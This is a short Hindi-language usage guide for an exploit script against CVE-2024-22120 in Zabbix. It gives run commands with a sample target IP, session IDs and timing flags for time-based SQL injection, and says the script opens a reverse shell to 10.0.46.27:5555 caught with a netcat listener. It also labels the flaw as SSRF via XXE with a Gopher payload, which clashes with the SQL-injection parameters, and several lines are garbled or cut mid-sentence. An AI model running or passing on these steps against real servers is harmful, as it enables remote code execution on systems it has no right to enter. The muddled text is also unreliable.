
यह CVE-2024-22120 के लिए मेरा एक्सप्लॉइट है, जिसमें Gopher पेलोड के साथ XXE के अंदर एक SSRF कमजोरी शामिल है।
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
आपने IP 192.168.1.100 पर चल रहे एक Zabbix सर्वर की पहचान की है, और आपके पास निम्नलिखित विवरण वाले निम्न-विशेषाधिकार वाले उपयोगकर्ता तक पहुंच है:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gआप इस स्क्रिप्ट का उपयोग करके RCE कमजोरियों का शोषण करना चाहते हैं।
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: Zabbix सर्वर का IP पता।--sid d82bf6715e1d3c1f25: निम्न-विशेषाधिकार वाले उपयोगकर्ता का सत्र आईडी।--hostid 10107: एक होस्ट का आईडी जिसे निम्न-विशेषाधिकार वाला उपयोगकर्ता एक्सेस कर सकता है।--phpsessid a4g7f48d9j3r7h8s9g: प्रमाणीकरण अनुरोधों के लिए उपयोग किया जाने वाला PHP सत्र आईडी।--false_time 1: SQL इंजेक्शन के दौरान गलत अनुमान के मामले में सोने का समय सेकंड में (डिफ़ॉल्ट 1 सेकंड है)।--true_time 3: SQL इंजेक्शन के दौरान सही अनुमान के मामले में सोने का समय सेकंड में (डिफ़ॉल्ट 3 सेकंड है)।स्क्रिप्ट में 10.0.46.27:5555`) से वापस कनेक्ट होगी।सुनिश्चित करें कि रिवर्स शेल को पकड़ने के लिए आपकी मशीन निर्दिष्ट पोर्ट (स्क्रिप्ट में 5555) पर सुन रही है। इसके लिए आप netcat` का उपयोग कर सकते हैं:
nc -lvnp 5555
रिवर्स शेल प्राप्त करने के लिए CreateScript फ़ंक्शन में IP 10.0.46.27 और पोर्ट 5555 को अपने स्वयं के IP और वांछित पोर्ट से बदलें।